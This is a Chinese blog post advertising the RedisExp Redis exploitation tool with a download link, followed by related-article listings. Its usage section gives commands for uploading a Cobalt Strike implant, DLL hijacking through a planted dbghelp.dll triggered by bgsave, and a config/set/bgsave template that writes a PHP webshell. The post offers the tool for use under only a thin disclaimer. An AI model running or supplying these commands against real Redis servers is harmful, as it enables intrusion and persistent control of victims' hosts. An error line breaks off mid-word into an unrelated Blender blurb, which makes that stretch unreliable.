RedisExp 一款Redis综合漏洞利用工具,附下载链接。|漏洞探测|9月漏洞汇总

本文为博客 VIP 文章,开通 VIP 后可阅读全文

开通 VIP

0x01 工具介绍

RedisExp 是一个用于利用 Redis 漏洞的多功能工具,支持执行 Redis 命令、主从复制、DLL/SO 加载、文件上传、计划任务写入、SSH 公钥配置等操作。该工具允许用户通过不同的模块实现远程命令执行、上传恶意文件以及劫持 DLL。它适用于研究 Redis 安全漏洞,仅供合法的安全研究使用,不承担非法用途的责任。
下载链接在文章开头

下载链接

RedisExp下载:RedisExp下载
👉地址 >>>点击直接加入星球获取更多网络安全工具
图片

0x02 功能简介

功能

  • exp.dll 和 exp.so 已经把内容分别加载到 dll.go 和 so.go 可以直接调用。

  • 在写入webshell的时候因为有一些特殊字符,可以使用把webshell进行 base64 编码,然后使用 -b 参数来解码

  • 有空格的目录或文件同时使用双引号和单引号 “‘a b’”

  • 关闭Redis压缩(写入乱码的时候可以关闭压缩,工具在写入shell的时候默认添加了关闭压缩,写入后再恢复开启压缩)

config set rdbcompression no
  • stop-writes-on-bgsave-error 默认为 yes, 如果 Redis 开启了 RDB 持久化并且最后一次失败了,Redis 默认会停止写入,让用户意识到数据的持久化没有正常工作。临时的解决方案是 conf set stop-writes-on-bgsave-error 设置为 no,只是让程序暂时忽略了这个问题,但是数据的持久化的问题并没有。(工具会默认设置为 no ,等工具退出的时候再重新设置回原来的值yes)
config set stop-writes-on-bgsave-error no

dll 劫持

利用dbghelp.dll:

上传 cs 马
.\RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp c:\users\public -rf test.exe  -lf artifact.exe

上传 dbghelp.dll 到 redis-server.exe 所在目录进行劫持
.\RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp . -rf dbghelp.dll  -lf dbghelp.dll

触发dll劫持
.\RedisEXP.exe -m bgsave -r 127.0.0.1 -p 6378 -w 123456

生成gohper

RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件

写shell模板

config set dir /tmp
config set dbfilename shell.php
set 'webshell' '<?php phpinfo();?>'
bgsave

报错

工具报错:[ERR Error loading the extension. Please check the server logs.]        module load /tmp/exp.s
Blender点云渲染实战:用Geometry Nodes快速搞定论文配图(Cycles渲染技巧) 本文详细介绍了如何利用Blender的Geometry Nodes系统,高效地将三维点云数据转化为高质量的科研论文配图。通过实战步骤,从数据导入、节点化几何处理、材质赋予到Cycles渲染引擎的优化设置,手把手教你制作出专业、美观的可视化图像,助力科研成果展示。 阅读详情

相关推荐

Mit6.S081-实验1-Xv6 and Unix utilities

Mit6.S081-实验1-Xv6 and Unix utilities前言一、Boot xv61,实验目的2,操作流程1)切换到xv6-labs-2020代码库的lab1分支2)启动xv63)测试xv64)过程分析5)其他操作二、在xv6中添加一个自己编写的程序1,源码准备2,编译配置3,测试添加程序4,过程分析三、xv6中shell简析 前言 一、Boot xv6 1,实验目的 利用qemu启动xv6 2,操作流程 1)切换到xv6-labs-2020代码库的lab1分支 git checkout ut

code a better life~ 36万+

一文清晰带你认识redis漏洞

主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。

逍遥小哥的博客 2276

中国银联无卡快捷支付技术规范

无卡快捷支付技术规范技管委发布版与开发版差异点说明.xlsx,中国银联无卡快捷支付技术规范 第1部分 交易处理及报文接口规范.pdf,中国银联无卡快捷支付技术规范 第2部分 文件接口规范.pdf

redis漏洞复现

目录 redis准备 启动redis服务器 redis漏洞利用 写入webshell 计划任务反弹shell 写入公钥远程连接 主从复制RCE(Linux) 主从同步RCE漏洞复现 Windows自启动 redis密码暴力破解 由于最近github的问题,已备好 资源包 提取码:ks18 redis准备 Linux 安装: https://redis.io/download tar xzf redis-6.0.1.tar.gz cd redis-6.0.1...

安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗 2617

redis漏洞利用

redis漏洞利用方式总结

欢迎来到D的博客! 1691

Redis未授权访问漏洞复现与工具安装

redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。Redis未授权访问影响版本为5.0.5以下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

Welcome To My6n Blog 4389

redis未授权访问漏洞利用+redis日志分析

下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz。将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下。将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/将redis-server 移动到/usr/bin/

ChenD的学习笔记 2000

Redis未授权访问漏洞利用

Redis未授权访问漏洞利用

weixin_53440207的博客 787

Redis漏洞及搭配ssrf利用的姿势

这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!

qq_71467825的博客 2925

Redis未授权访问漏洞的重现与利用

Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

qq_40882763的博客 2664

Redis 漏洞图形化利用工具

基于 Python 3 编写的 redis 漏洞图形化利用工具。⚠️ 注意: 主从复制命令执行会 清空 目标redis数据!!!!

LiBai'S BLOG 531

Redis漏洞利用的4种方法

Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更

qq_50854662的博客 5049

数据库攻防之Redis

Redis(Remote Dictionary Server)是一个由 Salvatore Sanfillppo 写的 key-value存储系统。是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的API。通常被称为数据结构服务器,因为值(value)可以是字符串(string)、哈希(hash)、列表(list)、集合(sets)和有序集合(sortedsets)等类型。

m0_71745754的博客 1381

系统入侵与提权之权限维持与Redis提权

系统入侵与提权之权限维持与Redis提权

没有网络安全就没有国家安全 1627

Redis数据结构

Redis诞生于2009年,全称是Remote Dictionnary Server,远程词典服务器,是一个基于内存的键值对NoSQL数据库。INCRBY:让一个整型的key自增并指定步长,例如:incrby num 2,让num值自增2。SETNX:添加一个String类型的键值对,前提是这个key不存在,否则不执行。SETEX:添加一个String类型的键值对,并且指定有效期。SET:添加或者修改已经存在的一个String类型的键值对。(3)float:浮点类型,可以做自增、自减操作。

weixin_43526092的博客 298

windows下面安装redis及php_redis.dll拓展

1、安装redis:windows下面安装redis坑很多,网上胡说八道的人更多,一路各种坑,在这里好好记上一笔。废话不多说,直接进入主题了!这个是我刚安装好了,亲测的。以下软件一定要根据自己的php版本,线程安全,cpu架构来下载!不然肯定报错! cpu架构,线程安全参考我写的另外一篇文章: http://blog.csdn.net/zhezhebie/article/details/7274

阳水平的博客 1万+

Redis漏洞大全~讲解最全的漏洞利用方法

Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。

weixin_67832625的博客 3673

Redis漏洞利用,原来大佬都是这样操作的

出自:Tide安全团队 1、前言 Redis相关的漏洞存在很长时间了,仍然存在可以利用的情景,本次整理复现下redis相关的漏洞利用,以便以后遇到能够快速建立利用思路。 2、redis介绍 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set()、zset(sorted set –有序)和...

qq_42982923的博客 2115

Redis 4.x RCE 原理及利用工具

Redis 4.x RCE 原理引言Redis 协议redis config命令RCE 漏洞原理区别MODULE LOAD利用工具防御方法 引言 没事干写博客,我过会改个名字叫没事干水博客,炒冷饭,水博客是我的专业。 Redis 协议 Redis 在socket连接后,发送的命令事实上并没有加密,只是一种固定协议。 我们连接上redis后,比如发送了一条set key value命令. socket中的数据事实上是这样的: 使用空格分隔文本 计算分隔后的数量,使用*n表示 遍历分隔后的每个子串 计算文本

Doub1's Blog 1064

redis未授权漏洞利用总结

redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据,并且可以利用redis写入shell、写入SSH公钥等危险操作。

Echo__h的博客 1669

redis-7】redis高级知识点

一: 性能监控指标 使用info命令可以查看redis状态 connected_clients:68 #连接的客户端数量 used_memory_rss_human:847.62M #系统给redis分配的内存 used_memory_peak_human:794.42M #内存使用的峰值大小 total_connections_received:619104 #服务器已接受的连接请求数量 instantaneous_ops_per_sec:1159 #服务器每秒钟执行的命令数量 qp

growing_duck的博客 557
上一篇: Acunetix v24.8 - 29 Aug 2024 高级版漏洞扫描器(最新版) 附Windows/Linux下载链接
下一篇: 批量SpringBoot漏洞扫描利用工具 绕过waf检测|漏洞探测,附下载链接。
渗透安全HackTwo
博客等级 码龄15年 149粉丝 10原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值